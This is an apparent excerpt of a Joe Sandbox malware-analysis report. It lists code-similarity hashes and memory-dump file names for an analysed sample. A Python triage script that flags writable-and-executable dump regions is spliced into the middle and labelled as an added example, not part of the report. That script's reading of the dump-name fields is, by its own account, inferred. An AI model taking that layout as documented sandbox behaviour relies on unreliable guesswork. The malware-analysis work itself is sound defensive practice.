                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 480b8282a10723de27e3d8fd6ff7c3c19139952345531e61b0001403412cddcd
                                                                              • Instruction ID: 5db52799e409a3039aa9b54350a4d0cc797d5ee1e948132c3c3479c6fb713d66
                                                                              • Opcode Fuzzy Hash: 480b8282a10723de27e3d8fd6ff7c3c19139952345531e61b0001403412cddcd
                                                                              • Instruction Fuzzy Hash: 12C16DB2A187419FC371CF28DC867ABB7E1BF85318F08892DD1D9C6242E778A155CB46
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cb6a9df339050140c0084c47fda67e2e594bd27fa04026ced9957d720d31a736
                                                                              • Instruction ID: 905d848f52d7ce7ccd5ff565519c64b8c9e299b66de82ac1fd2e690e60c406f0
                                                                              • Opcode Fuzzy Hash: cb6a9df339050140c0084c47fda67e2e594bd27fa04026ced9957d720d31a736
                                                                              • Instruction Fuzzy Hash: 68813B76A042614FCB26CE28C89035ABBD1AB85324F1D867DE8B99F3D2C674DC45C3C1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9721634e847a1cb3d3ca60ed4f0f794b68201035562961c9d45cfc6ea62b1461
                                                                              • Instruction ID: 970811030388f8af3fb23537ab9ff5cd5c4ae90a5bb1e85443668c748b63a761
                                                                              • Opcode Fuzzy Hash: 9721634e847a1cb3d3ca60ed4f0f794b68201035562961c9d45cfc6ea62b1461
                                                                              • Instruction Fuzzy Hash: 9D91F07160C3518FC329CF28D89176FBBE5EBC5304F15892DE5E59B291DBB4880A8B93
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: dcab719e968b2aee0f27e8fb51a2d65633524a128fc32ceb4dd443492b3639f2
                                                                              • Instruction ID: 7c687e98e4a216cdc8e50e4fb38f56ddba3c9cfcaa034ca50527612e0e9db3a4
                                                                              • Opcode Fuzzy Hash: dcab719e968b2aee0f27e8fb51a2d65633524a128fc32ceb4dd443492b3639f2
                                                                              • Instruction Fuzzy Hash: F4615AF3E183105BE310692DDC85767B7DAEB94720F1A453EEAC8D3784E97D980182D6
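The memory-dump names repeated in every "Memory Dump Source" record above carry the information a reverser needs to pick which dump to open: the base address of the region and the page protection it had when the sandbox captured it. The helper below is an added example (not Joe Sandbox code) that decodes those names and lists the image pages that were both writable and executable, which for a sample that rewrites its own section rights is where the unpacked code is most likely to be. The field layout it assumes (`proc.phase.dumpid.base.protect.state.type.seq.sdmp`) is inferred from the listing, not from documentation: the fourth field matches the Offset shown per source file, and the fifth and seventh fields take exactly the values of the Windows `PAGE_*` and `MEM_IMAGE` constants, so they are read as such. The sample names are copied from the records on this page.

```python
"""Decode Joe Sandbox .sdmp dump names and flag RWX image pages.

Added example, not part of the Joe Sandbox report or tooling.
ASSUMED name layout (inferred from the listing on this page):
    <proc>.<phase>.<dump id>.<base address>.<protect>.<state>.<type>.<seq>.sdmp
<base address> is taken to be the region base and <protect>/<type> are
decoded as winnt.h PAGE_* / MEM_* constants; the remaining fields are
kept as opaque strings.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List

# winnt.h page protection constants (low byte; PAGE_GUARD etc. live above it)
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = 0x10 | 0x20 | 0x40 | 0x80       # any PAGE_EXECUTE* variant
WRITE_MASK = 0x04 | 0x08 | 0x40 | 0x80      # RW or copy-on-write variants

# winnt.h region types (MEMORY_BASIC_INFORMATION.Type)
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
MEM_IMAGE = 0x1000000

SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<seq>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class Dump:
    name: str
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)


def parse_sdmp(name: str) -> Dump:
    """Split one .sdmp file name into address / protection / type."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a .sdmp name in the assumed layout: {name!r}")
    return Dump(name=m.group(0), base=int(m["base"], 16),
                protect=int(m["protect"], 16), mem_type=int(m["type"], 16))


def unpacking_candidates(names: Iterable[str]) -> List[Dump]:
    """Image pages that were writable AND executable at dump time.

    Those are the regions a packer most plausibly wrote the real code
    into before jumping to it, so they are the dumps to open first.
    """
    dumps = [parse_sdmp(n) for n in names]
    return sorted((d for d in dumps
                   if d.mem_type == MEM_IMAGE and d.executable and d.writable),
                  key=lambda d: d.base)


# Sample input: the 13 dump names from one "Memory Dump Source" record above.
SAMPLE_DUMPS = [
    "00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for d in unpacking_candidates(SAMPLE_DUMPS):
        print(f"{d.base:#010x}  {d.protect_name:<24} {d.type_name}  {d.name}")
```

Running it over the record's 13 dumps leaves 11 RWX or execute-writecopy image pages and drops only the two `PAGE_READWRITE` regions at 0x330000 and 0x386000 (the PE header and a data page). If a later report uses a different name layout, `parse_sdmp` raises rather than silently misreading the fields, which is the behaviour you want from a triage script.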
Memory Dump Source
• Source File: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d5768d6af9195c0bfced65b5352a5261c3c372c6cf897fa872cf0e69493df5a6
                                                                              • Instruction ID: 34f6956f7daf1389c95fbe081655f7748b0a02064ac6f225723c4c2398dd74d3
                                                                              • Opcode Fuzzy Hash: d5768d6af9195c0bfced65b5352a5261c3c372c6cf897fa872cf0e69493df5a6
                                                                              • Instruction Fuzzy Hash: 27514BF3E092149BE304AE38DC8576AB7E5EB90321F1B463DDEC997780E9351C058796
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0883c5799ce58fee53c7c8610b04c17795a417b6ee5abdf55466a0a450cf92a9
                                                                              • Instruction ID: 7180279b626eda8685f5a9119aa32d05f45f3baa1732a3950944460fcc6fe373
                                                                              • Opcode Fuzzy Hash: 0883c5799ce58fee53c7c8610b04c17795a417b6ee5abdf55466a0a450cf92a9
                                                                              • Instruction Fuzzy Hash: D0516CB15087548FE314DF29D89435BBBE1BB88318F158A2DE5E987350E779DA088F82
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0e3e4329bf501effe9640de56a394a4de57d771845d5cdfac1cf91fb6cdbd40c
                                                                              • Instruction ID: ffb22ecad5462582200a5a08c75a2949e85caaf1e9eceec1b573def3d0d231c5
                                                                              • Opcode Fuzzy Hash: 0e3e4329bf501effe9640de56a394a4de57d771845d5cdfac1cf91fb6cdbd40c
                                                                              • Instruction Fuzzy Hash: E34127F3A082109FE704696DEC957AAB7DADFC4321F2B453DEAC4D3744E979980082D6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3624f26ae902248aa76b65975e526587ed3512a2f5555543de540f42aeffc5e8
                                                                              • Instruction ID: b0977db37267f87f8d95ae18408a83228ca3debfb6969b3d3e52298130cf9bf0
                                                                              • Opcode Fuzzy Hash: 3624f26ae902248aa76b65975e526587ed3512a2f5555543de540f42aeffc5e8
                                                                              • Instruction Fuzzy Hash: 414108F3A0C200AFF3546969EC857ABF7E9EBE4320F1A453DEAD4C3744E63558018696
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3a43474baedd13b0d9d8ce7920c3662142fc8a9a34e14cd720fa28c50937b343
                                                                              • Instruction ID: 41271ec4a77e147d3a28fbf4e48d44074f3d3fe723e42ee60a4e34881ab3a7d0
                                                                              • Opcode Fuzzy Hash: 3a43474baedd13b0d9d8ce7920c3662142fc8a9a34e14cd720fa28c50937b343
                                                                              • Instruction Fuzzy Hash: DB31D533E219118BE714CA65CC4439632939BD9328F3E86B9D425DB696C97B9D0386C0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3b27da30260d6858ee9c27ae0cb648cfa99aba28daa990d8fa5e069db6b81016
                                                                              • Instruction ID: 047919515f5cbb97a59645e33265c5505b4bd5cc55a7d6b5ddf81611d7641f28
                                                                              • Opcode Fuzzy Hash: 3b27da30260d6858ee9c27ae0cb648cfa99aba28daa990d8fa5e069db6b81016
                                                                              • Instruction Fuzzy Hash: D3313462B1866207D71CCE38986237BABD29BD0B08F19493DD5D7DB7C0C528CE0987C2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d5a5d1427389668793eb2184808c6612ea255da26e82feb4f43e5749824597d3
                                                                              • Instruction ID: 06cbe67975340bc81ffe62c4d8c9008602327a544c064118b58b208e22eae5f5
                                                                              • Opcode Fuzzy Hash: d5a5d1427389668793eb2184808c6612ea255da26e82feb4f43e5749824597d3
                                                                              • Instruction Fuzzy Hash: 9631A0716082009BD7169F19C8C0A3BB7E1EF88358F1A8B2CF8998B345D735DC52CB82
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5a4a970c55273cdab4e5688a81588da14f9ce3d06b24cb059f074ba47c0f5e93
                                                                              • Instruction ID: c9a81d2da4ea34f0bf863681869734987127c82063dd412816c68e763cf5099a
                                                                              • Opcode Fuzzy Hash: 5a4a970c55273cdab4e5688a81588da14f9ce3d06b24cb059f074ba47c0f5e93
                                                                              • Instruction Fuzzy Hash: AE214CB250C704AFE309BE69DC8167AF7E5EB98310F12492DE7C5C3740EA3568108A9B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
